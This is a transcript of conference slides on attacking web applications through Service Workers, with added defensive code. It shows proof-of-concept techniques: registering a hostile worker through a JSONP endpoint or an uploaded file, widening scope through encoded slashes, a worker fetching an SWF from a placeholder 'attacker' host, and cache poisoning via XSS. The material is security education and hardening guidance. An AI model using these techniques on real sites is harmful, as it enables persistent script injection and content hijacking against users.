攻撃者視点で見る Service Worker (Service Workers from an Attacker's Perspective) / PWA Study SW
Masato Kinugawa
September 14, 2017
Technology
Slides presented at PWA Study (https://web-study.connpass.com/event/65267/).
Transcript
Registering a service worker from a page:

    <script>
      navigator.serviceWorker.register("/sw.js")
    </script>

References:
https://html5experts.jp/kyo_ago/5153/
https://speakerdeck.com/filedescriptor/exploiting-the-unexploitable-with-lesser-known-browser-tricks?slide=23
A JSONP endpoint that reflects the callback name into a same-origin text/javascript response. The reflected part is what the attacker controls; the trailing // comments out the JSON that follows it:

    HTTP/1.1 200 OK
    Content-Type: text/javascript; charset=UTF-8
    [...]

    alert(1)//({});

The same endpoint can therefore be registered as the worker script, with the worker code passed as the callback name:

    <script>
      navigator.serviceWorker.register("/jsonp?callback=[SW_HERE]//");
    </script>

    HTTP/1.1 200 OK
    Content-Type: text/javascript; charset=UTF-8
    [...]

    onfetch=event=>console.log('fetch')//({});

A file upload feature that serves user files from the same origin with a JavaScript MIME type works the same way: upload the worker body as sw.js, then register the uploaded file:

    <script>
      var formData = new FormData();
      formData.append("csrf_token", "secret");
      var sw = "/* [SW_CODE] */";
      var blob = new Blob([sw], { type: "text/javascript" });
      formData.append("file", blob, "sw.js");
      fetch("/upload", { method: "POST", body: formData })
        .then(/* Register SW */);
    </script>
Once registered, the worker answers every fetch in its scope with attacker-chosen content, here an HTML document carrying a script:

    onfetch = e => {
      const body = '<script>alert(1)</script>';
      const init = { headers: { 'content-type': 'text/html' } };
      e.respondWith(new Response(body, init));
    }
Scope. A registration can ask for a scope explicitly:

    <script>
      navigator.serviceWorker.register("/sw.js", { scope: "/" })
    </script>

Which of these registrations of /assets/js/sw.js are accepted? Without a Service-Worker-Allowed header the maximum scope is the directory the script is served from (/assets/js/), and the scope must be same-origin, so only the last two succeed:

    "/assets/js/sw.js", { scope: "https://other.example.com/" }   (rejected: different origin)
    "/assets/js/sw.js", { scope: "/assets/" }                     (rejected: broader than /assets/js/)
    "/assets/js/sw.js", { scope: "/assets/css/" }                 (rejected: outside /assets/js/)
    "/assets/js/sw.js", { scope: "/assets/js/" }                  (accepted)
    "/assets/js/sw.js", { scope: "/assets/js/sub/" }              (accepted)

The server can widen the maximum scope by sending Service-Worker-Allowed on the script response:

    HTTP/1.1 200 OK
    content-type: text/javascript
    service-worker-allowed: /
    [...]

The browser computes the maximum scope from the raw, undecoded path of the script URL. If the server decodes %2F before routing, these two URLs return the same script, but the second one has no directory after the leading slash and so gets a maximum scope of /:

    https://example.com/api/jsonp
    https://example.com/api%2Fjsonp

The same mismatch works in the other direction when checking whether a URL is in scope. To the browser the second URL below lies under /foo/, while a server that decodes and normalises it serves /out-of-scope/:

    https://example.com/out-of-scope/
    https://example.com/foo/..%2Fout-of-scope%2F
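The scope rules on the slides above, as an added example (not code from the talk). It re-implements the browser's maximum-scope computation and the in-scope check in plain JavaScript so the five /assets/js/sw.js cases, the Service-Worker-Allowed case, and the two %2F cases can be checked side by side. The assumption that the server percent-decodes %2F and normalises ".." before routing is exactly that, an assumption; whether a given server does so has to be tested.

```javascript
// Service worker scope rules, reconstructed from the spec (added example).
// - Without Service-Worker-Allowed, the maximum scope is the directory of the
//   script URL, taken from the raw (still percent-encoded) path.
// - A requested scope must be same-origin with the script and must start with
//   the maximum scope.
// - A request is in scope when its URL starts with the registered scope URL.

function defaultMaxScopePath(scriptPath) {
  // Everything up to and including the last "/" of the undecoded path.
  return scriptPath.slice(0, scriptPath.lastIndexOf('/') + 1);
}

// Absolute maximum scope for a script, honouring Service-Worker-Allowed
// (which the browser resolves relative to the script URL).
function maxScope(scriptUrl, serviceWorkerAllowed) {
  const script = new URL(scriptUrl);
  const scopePath = serviceWorkerAllowed !== undefined
    ? serviceWorkerAllowed
    : defaultMaxScopePath(script.pathname);
  return new URL(scopePath, script).href;
}

// Would navigator.serviceWorker.register(scriptUrl, { scope }) succeed?
function canRegister(scriptUrl, requestedScope, serviceWorkerAllowed) {
  const script = new URL(scriptUrl);
  const scope = new URL(requestedScope, script);
  if (scope.origin !== script.origin) return false;
  return scope.href.startsWith(maxScope(scriptUrl, serviceWorkerAllowed));
}

// Browser-side in-scope test used for fetch interception (prefix match on the
// raw URL; "..%2F" is an ordinary path segment here, not a dot segment).
function inScope(scopeUrl, requestUrl) {
  return new URL(requestUrl).href.startsWith(new URL(scopeUrl).href);
}

// Assumption: a server that percent-decodes the path and then resolves ".."
// before routing. Shows which resource such a server would actually serve.
function serverResolvedPath(url) {
  const u = new URL(url);
  return new URL(decodeURIComponent(u.pathname), u.origin).pathname;
}

// The five cases from the slide, for running the file directly.
const SCRIPT = 'https://example.com/assets/js/sw.js';
const SLIDE_CASES = [
  'https://other.example.com/', '/assets/', '/assets/css/', '/assets/js/', '/assets/js/sub/',
];
for (const scope of SLIDE_CASES) {
  console.log(`${SCRIPT} scope ${scope}: ${canRegister(SCRIPT, scope) ? 'accepted' : 'rejected'}`);
}
console.log('max scope of /api%2Fjsonp:', maxScope('https://example.com/api%2Fjsonp'));
console.log('server resolves /foo/..%2Fout-of-scope%2F to',
  serverResolvedPath('https://example.com/foo/..%2Fout-of-scope%2F'));
```

The two %2F functions make the attacker's gap explicit: the browser grants the worker a scope based on the literal path, while the server decides what content lives there after decoding. A server-side check that rejects percent-encoded slashes and dot segments in paths (or simply refuses to serve worker scripts from such endpoints at all) removes the mismatch.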
Flash. A worker can answer a request for a .swf on the victim origin with a file hosted by the attacker, so Flash treats the attacker's SWF as content of that origin and any cross-domain policy that trusts it applies:

    onfetch = e => {
      e.respondWith(fetch("//attacker/poc.swf"))
    }

    <?xml version="1.0"?>
    <cross-domain-policy>
      <allow-access-from domain="example.jp" />
    </cross-domain-policy>

https://github.com/cure53/XSSChallengeWiki/wiki/XSSMas-Challenge-2016
Foreign fetch. A third-party script included by other sites:

    <script src="//example.com/socialbutton.js"></script>

A foreign fetch worker registered on example.com can intercept requests to example.com coming from other origins and replace the response, here with alert(1):

    self.addEventListener('install', e => {
      e.registerForeignFetch({ scopes: ['/'], origins: ['*'] });
    });
    onforeignfetch = e => {
      e.respondWith(fetch(e.request).then(res => ({
        response: new Response('alert(1)')
      })))
    }

Foreign fetch was an experimental Chrome feature (origin trial) at the time of this talk and has since been removed from Chrome.
Cache poisoning. A typical cache-first worker, which serves whatever is in the cache and only goes to the network on a miss:

    onfetch = event => {
      event.respondWith(
        caches.open("v1").then(function (cache) {
          return cache.match(event.request).then(function (response) {
            if (response) {
              return response;
            } else {
              return fetch(event.request.clone()).then(function (response) {
                cache.put(event.request, response.clone());
                return response;
              });
            }
          });
        })
      );
    };

Page script on the same origin shares the Cache Storage, so a one-off XSS can plant an entry that the worker will keep serving after the XSS itself is fixed:

    <script>
      caches.open("v1").then(function (cache) {
        const content = "<script>alert(1)</script>";
        const init = { headers: { "content-type": "text/html" } };
        const request = new Request("poison.html");
        const response = new Response(content, init);
        cache.put(request, response);
      })
    </script>
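A hardened version of the cache-first worker above, added here as an example (not code from the talk). The policy decisions are plain functions so they can be run and tested outside a browser; the event wiring at the bottom only executes inside a ServiceWorkerGlobalScope. The asset list, cache name and version are assumptions.

```javascript
// Added example: cache-first worker with a restricted cache policy.
// It cannot stop same-origin page script from calling cache.put() (Cache Storage
// is shared), but it limits what a planted entry can be used for and gives each
// deploy a way to throw the old cache away.

const CACHE_VERSION = 'v2';                        // bump on every deploy (assumed)
const CACHE_NAME = `assets-${CACHE_VERSION}`;
const PRECACHE = ['/assets/app.js', '/assets/app.css']; // assumed static assets

// Only same-origin GET requests for the known static assets are ever answered
// from the cache. Navigations (HTML documents) always go to the network, so an
// entry like "poison.html" is never served as a page by this worker.
function cacheableRequest(url, method, mode, origin) {
  const u = new URL(url, origin);
  if (method !== 'GET') return false;
  if (mode === 'navigate') return false;
  if (u.origin !== origin) return false;
  return PRECACHE.includes(u.pathname);
}

// Only successful, same-origin ("basic") responses are written to the cache.
function cacheableResponse(response) {
  return Boolean(response && response.ok && response.type === 'basic');
}

// Every cache except the current version is deleted on activate, so a new
// deploy evicts whatever an earlier XSS planted.
function cachesToDelete(existingNames) {
  return existingNames.filter(name => name !== CACHE_NAME);
}

if (typeof ServiceWorkerGlobalScope !== 'undefined' && self instanceof ServiceWorkerGlobalScope) {
  self.addEventListener('install', event => {
    event.waitUntil(
      caches.open(CACHE_NAME)
        .then(cache => cache.addAll(PRECACHE))
        .then(() => self.skipWaiting())
    );
  });

  self.addEventListener('activate', event => {
    event.waitUntil(
      caches.keys()
        .then(names => Promise.all(cachesToDelete(names).map(name => caches.delete(name))))
        .then(() => self.clients.claim())
    );
  });

  self.addEventListener('fetch', event => {
    const req = event.request;
    if (!cacheableRequest(req.url, req.method, req.mode, self.location.origin)) {
      return; // not handled: the browser fetches from the network as usual
    }
    event.respondWith(
      caches.open(CACHE_NAME).then(async cache => {
        const hit = await cache.match(req);
        if (hit) return hit;
        const res = await fetch(req);
        if (cacheableResponse(res)) await cache.put(req, res.clone());
        return res;
      })
    );
  });
}
```

The remaining exposure is a poisoned entry for one of the precached assets, which this worker would still serve until the next deploy; that is the case Clear-Site-Data (later slide) exists for.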
The same persistence exists without a worker wherever a page reads stored data into the DOM unsafely; a stored localStorage value keeps firing on every load:

    <script>
      document.write(localStorage.getItem('name'));
    </script>

Cleanup. A Clear-Site-Data response header tells the browser to wipe the origin's storage, which covers Cache Storage, localStorage and service worker registrations:

    HTTP/1.1 200 OK
    Content-Type: text/html
    Clear-Site-Data: "storage"
Detecting registration on the server. The browser marks the fetch of a worker script with a Service-Worker: script request header, which lets the server distinguish it from an ordinary script load:

    GET https://example.com/sw.js HTTP/1.1
    Host: example.com
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
    Accept: */*
    Service-Worker: script
    Referer: https://example.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: ja,en;q=0.8,en-US;q=0.6
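The server-side checks that close the JSONP and upload registration tricks from the earlier slides, written as an added example (plain functions, no framework; not code from the talk). The /sw.js, /api/jsonp and /uploads/ paths, the callback parameter name and the allow-listed worker path are assumptions; the Service-Worker: script header is the one shown in the request above.

```javascript
// Added example: a minimal request handler that (1) refuses to serve anything
// but the known worker script when the request carries "Service-Worker: script",
// (2) validates JSONP callback names so code cannot be reflected, and (3) serves
// uploads with a non-script MIME type, which the browser will not accept as a
// worker script even without the header check.

const WORKER_SCRIPTS = new Set(['/sw.js']);                 // assumed allow-list
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/; // bare identifier chain
const WORKER_SOURCE = "onfetch = e => { /* the legitimate worker */ };"; // constructed
const DATA = { ok: true };                                   // constructed JSONP payload
const UPLOADS = { '/uploads/sw.js': 'onfetch = e => {}' };   // constructed user upload

// Case-insensitive header lookup on a { name: value } object.
function header(req, name) {
  for (const [k, v] of Object.entries(req.headers || {})) {
    if (k.toLowerCase() === name) return v;
  }
  return undefined;
}

function text(status, body) {
  return { status, headers: { 'Content-Type': 'text/plain; charset=utf-8' }, body };
}

// req = { url, headers }; returns { status, headers, body }.
function handle(req) {
  const url = new URL(req.url, 'https://example.com');
  const workerFetch = header(req, 'service-worker') === 'script';

  // A registration fetch for any path that is not a known worker is refused,
  // regardless of what that endpoint would otherwise return.
  if (workerFetch && !WORKER_SCRIPTS.has(url.pathname)) {
    return text(403, 'not a service worker script');
  }

  if (url.pathname === '/sw.js') {
    return {
      status: 200,
      headers: { 'Content-Type': 'text/javascript; charset=utf-8', 'Service-Worker-Allowed': '/' },
      body: WORKER_SOURCE,
    };
  }

  if (url.pathname === '/api/jsonp') {
    const cb = url.searchParams.get('callback') || 'callback';
    if (!CALLBACK_RE.test(cb)) return text(400, 'invalid callback name');
    return {
      status: 200,
      headers: { 'Content-Type': 'application/javascript; charset=utf-8', 'X-Content-Type-Options': 'nosniff' },
      // Leading comment defeats content sniffing of the reflected prefix.
      body: `/**/ ${cb}(${JSON.stringify(DATA)});`,
    };
  }

  if (url.pathname.startsWith('/uploads/')) {
    const file = UPLOADS[url.pathname];
    if (file === undefined) return text(404, 'no such upload');
    return {
      status: 200,
      headers: {
        'Content-Type': 'application/octet-stream',
        'Content-Disposition': 'attachment',
        'X-Content-Type-Options': 'nosniff',
      },
      body: file,
    };
  }

  return text(404, 'not found');
}
```

The header check is the cheap, broad control: one line that turns every "same-origin JavaScript-typed response" into a non-issue for registration. The MIME-type and callback checks matter independently, since a worker script can also pull code in through importScripts() and a reflected callback is an XSS in its own right.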